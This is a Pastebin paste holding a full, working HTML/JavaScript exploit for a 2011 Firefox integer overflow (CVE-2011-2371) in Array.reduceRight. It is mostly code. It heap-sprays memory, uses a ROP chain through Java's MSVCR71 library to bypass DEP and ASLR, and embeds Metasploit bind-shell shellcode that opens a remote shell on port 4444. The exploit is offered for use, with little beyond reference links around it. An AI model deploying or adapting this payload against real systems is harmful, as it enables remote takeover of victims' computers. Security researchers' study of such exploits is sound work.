API tools faq
paste
Guest User

Untitled

a guest
Oct 13th, 2011
37
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.71 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>ff-i-<3-u</title>
  4. </head>
  5. <body>
  6. <center>
  7. <br />
  8. Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br />
  9. Date: 12 Oct 2011<br />
  10. Author: Matteo Memelli ryujin -AT- offensive-security.com<br />
  11. CVE-2011-2371<br />
  12. Full exploit package: <br />
  13. http://www.exploit-db.com/sploits/17974.zip <br />
  14. <br />
  15. Thx to dookie for helping ;)<br/>
  16. Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br />
  17. http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/>
  18. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/>
  19. DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/>
  20. Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/>
  21. <APPLET id="MyApplet" code="ph33r.class" width=150 height=50>
  22. You need a Java-enabled browser to pwn this.
  23. </APPLET>
  24. </center>
  25. <script type="text/javascript">
  26. var applet = document.getElementById('MyApplet');
  27.  
  28. function spray() {
  29. // fake object pointers
  30. var ptrs = unescape("%u4141" + // padding
  31. // MOV EDX,DWORD[ESI] 0c000048=0c00007c
  32. "%u0048%u0c00" +
  33. "%u4141%u4141" + // padding
  34. "%u4141%u4141" + // padding
  35. "%u4141%u4141" + // padding
  36. "%u4141%u4141" + // padding
  37. "%u4141%u4141" + // padding
  38. "%u4141%u4141" + // padding
  39. "%u4141%u4141" + // padding
  40. "%u4141%u4141" + // padding
  41. "%u4141" + // padding
  42. // PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3]
  43. // RETN 1C75
  44. "%u0EEF%u7C37" +
  45. "%u4141%u4141" + // padding
  46. "%u4141" + // padding
  47. "%u240c%u3410" + // 3410240c RETN after PIVOT
  48. "%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER
  49. "%u4141%u4141" + // padding
  50. "%u4141%u4141" + // padding
  51. "%u4141%u4141" + // padding
  52. "%u4141%u4141" + // padding
  53. "%u4141%u4141" + // padding
  54. "%u4141%u4141" + // padding
  55. "%u4141%u4141" + // padding
  56. "%u4141%u4141" + // padding
  57. "%u4141%u4141" + // padding
  58. "%u4141%u4141" + // padding
  59. "%u4141%u4141" + // padding
  60. "%u4141%u4141" + // padding
  61. "%u002e%u0c00"); // 0c00007c -> 0c00002e
  62. // CALL PIVOT 0x7C370EEF
  63.  
  64. var bheader = 0x12/2; // u.n.d.e.f.i.n.e.d. string
  65. // beginning of each array element
  66. var nullt = 0x2/2; // string null terminator
  67.  
  68. // 0:000> ? 0c001cbe - 0c000012
  69. // Evaluate expression: 7340 = 00001cac
  70. var espoffset = (7340 /2) - ptrs.length;
  71. var esppadding = unescape("%u0c0c%u0c0c");
  72. while(esppadding.length < espoffset) {esppadding += esppadding;}
  73. esppadding = esppadding.substring(0, espoffset);
  74.  
  75. // sayonara rop chain
  76. rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
  77. rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
  78. rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
  79. rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
  80. rop += unescape("%u5645%u7c36"); // pop esi;ret;
  81. rop += unescape("%u5243%u7c34"); // ret;
  82. rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
  83. rop += unescape("%u87ec%u7c34"); // call eax;
  84. rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
  85. rop += unescape("%ufdff%uffff"); // {size}
  86. rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
  87. rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
  88. rop += unescape("%u39fa%u7c34"); // pop edx;ret;
  89. rop += unescape("%uffc0%uffff"); // {flag}
  90. rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
  91. rop += unescape("%u4648%u7c35"); // pop edi;ret;
  92. rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
  93. rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
  94. rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
  95. rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
  96. rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
  97. rop += unescape("%u683f%u7c36"); // push esp;ret;
  98. rop += unescape("%ubc90%u0c0c%u0c0c"); // NOP / MOV ESP,0x0c0c0c0c
  99.  
  100. // windows/shell_bind_tcp - 341 bytes
  101. // http://www.metasploit.com
  102. // VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=process,
  103. // InitialAutoRunScript=, AutoRunScript=
  104. var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
  105. "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
  106. "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
  107. "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
  108. "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
  109. "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
  110. "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
  111. "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
  112. "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
  113. "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
  114. "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
  115. "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
  116. "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
  117. "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
  118. "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
  119. "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
  120. "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
  121. "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
  122. "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
  123. "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
  124. "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
  125. "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
  126. "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
  127. "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
  128. "%u006a%uff53%u41d5");
  129. rop += shell;
  130.  
  131. var tr_padding = unescape("%u0c0c%u0c0c");
  132. while(tr_padding.length < 0x80000) {tr_padding += tr_padding;}
  133.  
  134. var dummy = ptrs + esppadding + rop + tr_padding;
  135. var hspray = dummy.substring(0,0x80000 - bheader - nullt);
  136.  
  137. // Allocation of 64 blocks of 1Mb.
  138. HeapBlocks = new Array()
  139. for (i=0;i<0x40;i++){
  140. HeapBlocks[i] += hspray;
  141. }
  142. }
  143.  
  144. spray();
  145. hola = new Array;
  146. hola.length = 2197815302; // 0x0c000014 beginning of sprayed block
  147.  
  148. w00t = function ph33r(prev, myobj, indx, array) {
  149. alert(myobj[0]); // trigger getProperty
  150. }
  151.  
  152. hola.reduceRight(w00t,1,2,3);
  153.  
  154. </script>
  155. </body>
  156. </html>
  157.  
  158.  
  159. # [2011-10-12]
  160.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!